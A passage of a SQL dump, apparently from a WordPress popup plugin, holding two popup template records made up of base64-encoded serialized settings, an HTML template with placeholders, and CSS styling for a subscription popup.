17:59:43',3,0),(10,'Informed',1,0,'YTozOntzOjQ6Im1haW4iO2E6Mjk6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoyNjoiY2xvc2Vfb25fYWZ0ZXJfYWN0aW9uX3RpbWUiO3M6MToiMSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6MTQ6InNob3dfZGF0ZV9mcm9tIjtzOjA6IiI7czoxMjoic2hvd19kYXRlX3RvIjtzOjA6IiI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5OiJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjE1OiJjb3VudF90aW1lc19udW0iO3M6MToiMSI7czoxNToiY291bnRfdGltZXNfbWVzIjtzOjM6ImRheSI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX3NlYXJjaF9lbmdpbmVzX3Nob3ciO3M6MToiMCI7czoxODoiaGlkZV9wcmVnX3VybF9zaG93IjtzOjE6IjAiO3M6MTM6ImhpZGVfcHJlZ191cmwiO3M6MDoiIjt9czozOiJ0cGwiO2E6ODg6e3M6NToid2lkdGgiO3M6MzoiNDAwIjtzOjEzOiJ3aWR0aF9tZWFzdXJlIjtzOjI6InB4IjtzOjE4OiJiZ19vdmVybGF5X29wYWNpdHkiO3M6MzoiMC41IjtzOjk6ImJnX3R5cGVfMCI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMCI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzAiO3M6NzoiI2NjY2NjYyI7czo5OiJiZ190eXBlXzEiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzEiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8xIjtzOjc6IiNmZjAwMDAiO3M6MTA6ImZvbnRfbGFiZWwiO3M6NzoiZGVmYXVsdCI7czoxNjoibGFiZWxfZm9udF9jb2xvciI7czo3OiIjMDAwMDAwIjtzOjEwOiJmb250X3R4dF8wIjtzOjc6ImRlZmF1bHQiO3M6MTc6InRleHRfZm9udF9jb2xvcl8wIjtzOjc6IiMwMDAwMDAiO3M6MTE6ImZvbnRfZm9vdGVyIjtzOjc6ImRlZmF1bHQiO3M6MTc6ImZvb3Rlcl9mb250X2NvbG9yIjtzOjc6IiM1ODU4NTgiO3M6MTU6InJlc3BvbnNpdmVfbW9kZSI7czozOiJkZWYiO3M6MTc6InJlaWRyZWN0X29uX2Nsb3NlIjtzOjA6IiI7czo5OiJjbG9zZV9idG4iO3M6OToic3FyX2Nsb3NlIjtzOjc6ImJ1bGxldHMiO3M6MTE6Imxpc3RzX2dyZWVuIjtzOjExOiJsYXllcmVkX3BvcyI7czozOiJ0b3AiO3M6OToiZW5iX2xhYmVsIjtzOjE6IjEiO3M6NToibGFiZWwiO3M6MTI6IkJlIGluZm9ybWVkISI7czo5OiJlbmJfdHh0XzAiO3M6MToiMSI7czo5OiJmb290X25vdGUiO3M6MTE4OiJXZSByZXNwZWN0IHlvdXIgcHJpdmFjeS4gWW91ciBpbmZvcm1hdGlvbiB3aWxsIG5vdCBiZSBzaGFyZWQgd2l0aCBhbnkgdGhpcmQgcGFydHkgYW5kIHlvdSBjYW4gdW5zdWJzY3JpYmUgYXQgYW55IHRpbWUgIjtzOjE1OiJlbmJfc21fZmFjZWJvb2siO3M6MToiMSI7czoxNzoiZW5iX3NtX2dvb2dsZXBsdXMiO3M6MToiMSI7czoxNDoiZW5iX3NtX3R3aXR0ZXIiO3M6MToiMSI7czo5OiJzbV9kZXNpZ24iO3M6NDoiYm94eSI7czo4OiJhbmltX2tleSI7czo0OiJub25lIjtzOjEzOiJhbmltX2R1cmF0aW9uIjtzOjA6IiI7czoxMzoiZW5iX3N1YnNjcmliZSI7czoxOiIxIjtzOjg6InN1Yl9kZXN0IjtzOjk6IndvcmRwcmVzcyI7czoyMzoic3ViX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTk6InN1Yl9hd2ViZXJfbGlzdG5hbWUiO3M6MDoiIjtzOjIxOiJzdWJfYXdlYmVyX2FkdHJhY2tpbmciO3M6MDoiIjtzOjIxOiJzdWJfbWFpbGNoaW1wX2FwaV9rZXkiO3M6MDoiIjtzOjI1OiJzdWJfbWFpbGNoaW1wX2dyb3Vwc19mdWxsIjtzOjA6IiI7czoxNDoic3ViX2dyX2FwaV9rZXkiO3M6MDoiIjtzOjE2OiJzdWJfZ3JfY3ljbGVfZGF5IjtzOjE6IjAiO3M6MTM6InN1Yl9pY19hcHBfaWQiO3M6MDoiIjtzOjE1OiJzdWJfaWNfYXBwX3VzZXIiO3M6MDoiIjtzOjE1OiJzdWJfaWNfYXBwX3Bhc3MiO3M6MDoiIjtzOjE0OiJzdWJfYWNfYXBpX3VybCI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfa2V5IjtzOjA6IiI7czoxODoic3ViX2FyX2Zvcm1fYWN0aW9uIjtzOjA6IiI7czoxMDoic3ViX3NnYV9pZCI7czowOiIiO3M6MTU6InN1Yl9zZ2FfbGlzdF9pZCI7czowOiIiO3M6MjE6InN1Yl9zZ2FfYWN0aXZhdGVfY29kZSI7czowOiIiO3M6MTM6InN1Yl9zZl9hcHBfaWQiO3M6MDoiIjtzOjE0OiJzdWJfY2tfYXBpX2tleSI7czowOiIiO3M6MTQ6InN1Yl9tZW1fYWNjX2lkIjtzOjA6IiI7czoxNToic3ViX21lbV9wdWRfa2V5IjtzOjA6IiI7czoxNjoic3ViX21lbV9wcml2X2tleSI7czowOiIiO3M6MTA6InN1Yl9maWVsZHMiO2E6Mjp7czo1OiJlbWFpbCI7YTo3OntzOjQ6Im5hbWUiO3M6NToiZW1haWwiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjY6IkUtTWFpbCI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjEiO3M6MzoiZW5iIjtzOjE6IjEiO31zOjQ6Im5hbWUiO2E6Njp7czo0OiJuYW1lIjtzOjQ6Im5hbWUiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjQ6Ik5hbWUiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIwIjt9fXM6MjA6InN1Yl90eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJzdWJfdHh0X3N1Y2Nlc3MiO3M6MjQ6IlRoYW5rIHlvdSBmb3Igc3Vic2NyaWJlISI7czoyMToic3ViX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjIwOiJzdWJfdHh0X2V4aXN0c19lbWFpbCI7czoyMjoiRW1wdHkgb3IgaW52YWxpZCBlbWFpbCI7czoxNjoic3ViX3JlZGlyZWN0X3VybCI7czowOiIiO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX3N1YmplY3QiO3M6MzQ6IkNvbmZpcm0gc3Vic2NyaXB0aW9uIG9uIFtzaXRlbmFtZV0iO3M6MjU6InN1Yl90eHRfY29uZmlybV9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjI4OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9tZXNzYWdlIjtzOjE5NzoiWW91IHN1YnNjcmliZWQgb24gc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4uIEZvbGxvdyA8YSBocmVmPVwiW2NvbmZpcm1fbGlua11cIj50aGlzIGxpbms8L2E+IHRvIGNvbXBsZXRlIHlvdXIgc3Vic2NyaXB0aW9uLiBJZiB5b3UgZGlkIG5vdCBzdWJzY3JpYmUgaGVyZSAtIGp1c3QgaWdub3JlIHRoaXMgbWVzc2FnZS4iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX3N1YmplY3QiO3M6Mzc6IltzaXRlbmFtZV0gWW91ciB1c2VybmFtZSBhbmQgcGFzc3dvcmQiO3M6Mjg6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjMxOiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9tZXNzYWdlIjtzOjY1OiJVc2VybmFtZTogW3VzZXJfbG9naW5dPGJyIC8+UGFzc3dvcmQ6IFtwYXNzd29yZF08YnIgLz5bbG9naW5fdXJsXSI7czoyNToic3ViX3JlZGlyZWN0X2VtYWlsX2V4aXN0cyI7czowOiIiO3M6MTM6InN1Yl9idG5fbGFiZWwiO3M6Mzoi4oiaIjtzOjEzOiJzdWJfbmV3X2VtYWlsIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoxNToic3ViX25ld19tZXNzYWdlIjtzOjEyOToiWW91IGhhdmUgbmV3IHN1YnNjcmliZXIgb24geW91ciBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwgaGVyZSBpcyBzdWJzY3JpYmVyIGluZm9ybWF0aW9uOjxiciAvPltzdWJzY3JpYmVyX2RhdGFdIjtzOjg6ImxvZ2luX2J5IjtzOjg6InVzZXJuYW1lIjtzOjE4OiJsb2dpbl9yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjE1OiJsb2dpbl9idG5fbGFiZWwiO3M6NToiTG9naW4iO3M6MjM6InJlZ193cF9jcmVhdGVfdXNlcl9yb2xlIjtzOjEwOiJzdWJzY3JpYmVyIjtzOjEzOiJyZWdfYnRuX2xhYmVsIjtzOjg6IlJlZ2lzdGVyIjtzOjEwOiJyZWdfZmllbGRzIjthOjI6e3M6NDoibmFtZSI7YTo3OntzOjM6ImVuYiI7czoxOiIxIjtzOjQ6Im5hbWUiO3M6NDoibmFtZSI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NDoiTmFtZSI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjAiO31zOjU6ImVtYWlsIjthOjc6e3M6NDoibmFtZSI7czo1OiJlbWFpbCI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NjoiRS1NYWlsIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMSI7czozOiJlbmIiO3M6MToiMSI7fX1zOjIwOiJyZWdfdHh0X2NvbmZpcm1fc2VudCI7czo2NzoiQ29uZmlybWF0aW9uIGxpbmsgd2FzIHNlbnQgdG8geW91ciBlbWFpbCBhZGRyZXNzLiBDaGVjayB5b3VyIGVtYWlsISI7czoxNToicmVnX3R4dF9zdWNjZXNzIjtzOjI3OiJUaGFuayB5b3UgZm9yIHJlZ2lzdHJhdGlvbiEiO3M6MjE6InJlZ190eHRfaW52YWxpZF9lbWFpbCI7czoyMjoiRW1wdHkgb3IgaW52YWxpZCBlbWFpbCI7czoxNjoicmVnX3JlZGlyZWN0X3VybCI7czowOiIiO3M6Mjg6InJlZ190eHRfY29uZmlybV9tYWlsX3N1YmplY3QiO3M6MzQ6IkNvbmZpcm0gcmVnaXN0cmF0aW9uIG9uIFtzaXRlbmFtZV0iO3M6MjU6InJlZ190eHRfY29uZmlybV9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjI4OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9tZXNzYWdlIjtzOjE5NjoiWW91IHJlZ2lzdGVyZWQgb24gc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4uIEZvbGxvdyA8YSBocmVmPVwiW2NvbmZpcm1fbGlua11cIj50aGlzIGxpbms8L2E+IHRvIGNvbXBsZXRlIHlvdXIgcmVnaXN0cmF0aW9uLiBJZiB5b3UgZGlkIG5vdCByZWdpc3RlciBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToicmVnX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoicmVnX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjEzOiJyZWdfbmV3X2VtYWlsIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoxNToicmVnX25ld19tZXNzYWdlIjtzOjEyMToiWW91IGhhdmUgbmV3IG1lbWJlciBvbiB5b3VyIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LCBoZXJlIHVzIG1lbWJlciBpbmZvcm1hdGlvbjo8YnIgLz5bc3Vic2NyaWJlcl9kYXRhXSI7czo1OiJ0eHRfMCI7czoxNzI6IjxwPlBvcHVwIGJ5IFN1cHN5c3RpYyBsZXRzIHlvdSBlYXNpbHkgY3JlYXRlIGVsZWdhbnQgb3ZlcmxhcHBpbmcgd2luZG93cyB3aXRoIHVubGltaXRlZCBmZWF0dXJlcy4gUG9wLXVwcyB3aXRoIFNsaWRlciwgTGlnaHRib3gsIENvbnRhY3QgYW5kIFN1YnNjcmlwdGlvbiBmb3JtcyBhbmQgbW9yZTwvcD4iO31zOjEwOiJvcHRzX2F0dHJzIjthOjI6e3M6OToiYmdfbnVtYmVyIjtzOjE6IjIiO3M6MTY6InR4dF9ibG9ja19udW1iZXIiO3M6MToiMSI7fX0=','<link rel=\"stylesheet\" type=\"text/css\" href=\"//fonts.googleapis.com/css?family=Amatic+SC\" />\r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			[if enb_label]\r\n				<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_txt_0]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n				[txt_0]\r\n				</div>\r\n			[endif]\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input class=\"butt\" type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			<div class=\"ppsRightCol\">\r\n				[if enb_sm]\r\n					<div style=\"clear: both;\"></div>\r\n					<div class=\"ppsSm\">\r\n					[sm_html]\r\n					</div>\r\n				[endif]\r\n				[if enb_foot_note]\r\n					<div class=\"ppsFootNote\">\r\n					[foot_note]\r\n					</div>\r\n				[endif]\r\n			</div>\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: \'arial\', arial;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  {% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 100%;\r\n  	border-radius: 4px;\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n  	padding: 10px;\r\n	[if bg_type_0 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  	\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #000;\r\n	text-align: center;\r\n	font-size: 45px;\r\n	letter-spacing: -1px;\r\n	line-height: 40px;\r\n	letter-spacing: -1px;\r\n	font-weight: bold;\r\n	margin-top: 15px;\r\n	margin-bottom: 16px;\r\n	padding-left: 20px;\r\n	-moz-text-shadow: 0px 0px 1px #000;\r\n	-webkit-text-shadow: 0px 0px 1px #000;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 1% 1% 1% 1%;\r\n	text-align:right;\r\n	margin-bottom: 20px;\r\n  	padding-left: 20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	/*width: 100%;*/\r\n  	margin-bottom: 10px;\r\n  	height: 40px;\r\n  	border: 0px solid #d1b36d;\r\n	border-radius: 4px !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	box-shadow: 2px 2px 2px #dcdcdc inset;\r\n  	padding-left: 20px;\r\n  	font-size: 17px;\r\n	width: 100%;\r\n  	max-width: 284px;\r\n	display: block;\r\n	float: left;\r\n  	border: 1px solid #000;\r\n  	background-color: #fff;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n  	text-align: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	font-size: 17px;\r\n	border-top-right-radius: 4px;\r\n  	border-bottom-right-radius: 4px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[name=\"email\"] {\r\n	width:75%;\r\n	background-attachment: scroll;\r\n	background-position: 0px center;\r\n  	border: 1px solid #000;\r\n  	display:block;\r\n  	float:left;\r\n  	padding-left:20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border-color: #000;\r\n	width: 15%;\r\n  	display:block;\r\n  	float: left;\r\n	margin-left: 10px;\r\n  	padding: 10px;\r\n  	[if bg_type_1 == \'color\']\r\n  	background: [bg_color_1] 100%;\r\n   box-shadow: -4px -4px 0px rgba(0, 0, 0, 0.1) inset;\r\n  	background-image: none;\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  \r\n  	color: #fff;\r\n    font-size: 20px;\r\n    text-shadow: 1px 1px 1px #000;\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n   box-shadow: 4px 4px 0px rgba(0, 0, 0, 0.1) inset;\r\n	\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n	float: left;\r\n  	width: 80%;\r\n	margin-left: 10%;\r\n	text-align: center;\r\n	color: black;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n	top: 15px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n	color: #585858;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSm{\r\n	margin-top:20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubMsg{\r\n	clear: both;\r\n  	text-align: left;\r\n}\r\n\r\n\r\n\r\n','informed.jpg',1,1,1,1,0,0,0,'2015-01-10 17:59:43',5,0),(11,'START popup',1,0,'YTozOntzOjQ6Im1haW4iO2E6Mjk6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoyNjoiY2xvc2Vfb25fYWZ0ZXJfYWN0aW9uX3RpbWUiO3M6MToiMSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6MTQ6InNob3dfZGF0ZV9mcm9tIjtzOjA6IiI7czoxMjoic2hvd19kYXRlX3RvIjtzOjA6IiI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5OiJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjE1OiJjb3VudF90aW1lc19udW0iO3M6MToiMSI7czoxNToiY291bnRfdGltZXNfbWVzIjtzOjM6ImRheSI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX3NlYXJjaF9lbmdpbmVzX3Nob3ciO3M6MToiMCI7czoxODoiaGlkZV9wcmVnX3VybF9zaG93IjtzOjE6IjAiO3M6MTM6ImhpZGVfcHJlZ191cmwiO3M6MDoiIjt9czozOiJ0cGwiO2E6OTY6e3M6NToid2lkdGgiO3M6MzoiODI0IjtzOjEzOiJ3aWR0aF9tZWFzdXJlIjtzOjI6InB4IjtzOjE4OiJiZ19vdmVybGF5X29wYWNpdHkiO3M6MzoiMC41IjtzOjk6ImJnX3R5cGVfMCI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMCI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzAiO3M6NzoiI2ZmZmZmZiI7czo5OiJiZ190eXBlXzEiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzEiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8xIjtzOjc6IiNkYTk3MzIiO3M6OToiYmdfdHlwZV8yIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18yIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMiI7czo3OiIjNTQ4ZDJjIjtzOjEwOiJmb250X2xhYmVsIjtzOjc6ImRlZmF1bHQiO3M6MTY6ImxhYmVsX2ZvbnRfY29sb3IiO3M6NzoiIzU2OTEyZCI7czoxMDoiZm9udF90eHRfMCI7czo3OiJkZWZhdWx0IjtzOjE3OiJ0ZXh0X2ZvbnRfY29sb3JfMCI7czo3OiIjODg4ODg4IjtzOjEwOiJmb250X3R4dF8xIjtzOjc6ImRlZmF1bHQiO3M6MTc6InRleHRfZm9udF9jb2xvcl8xIjtzOjc6IiNmZmZmZmYiO3M6MTE6ImZvbnRfZm9vdGVyIjtzOjc6ImRlZmF1bHQiO3M6MTc6ImZvb3Rlcl9mb250X2NvbG9yIjtzOjc6IiM1ODU4NTgiO3M6MTU6InJlc3BvbnNpdmVfbW9kZSI7czozOiJkZWYiO3M6MTc6InJlaWRyZWN0X29uX2Nsb3NlIjtzOjA6IiI7czo5OiJjbG9zZV9idG4iO3M6MTE6IndoaWxlX2Nsb3NlIjtzOjc6ImJ1bGxldHMiO3M6MTI6ImNpcmNsZV9ncmVlbiI7czoxMToibGF5ZXJlZF9wb3MiO3M6MzoidG9wIjtzOjk6ImVuYl9sYWJlbCI7czoxOiIxIjtzOjU6ImxhYmVsIjtzOjI1OiJEbyB5b3Ugd2FudCBtb3JlIHRyYWZmaWM/IjtzOjk6ImVuYl90eHRfMCI7czoxOiIxIjtzOjk6ImVuYl90eHRfMSI7czoxOiIxIjtzOjEzOiJlbmJfZm9vdF9ub3RlIjtzOjE6IjEiO3M6OToiZm9vdF9ub3RlIjtzOjQ3OiIqIHdlIG5ldmVyIHNoYXJlIHlvdXIgZS1tYWlsI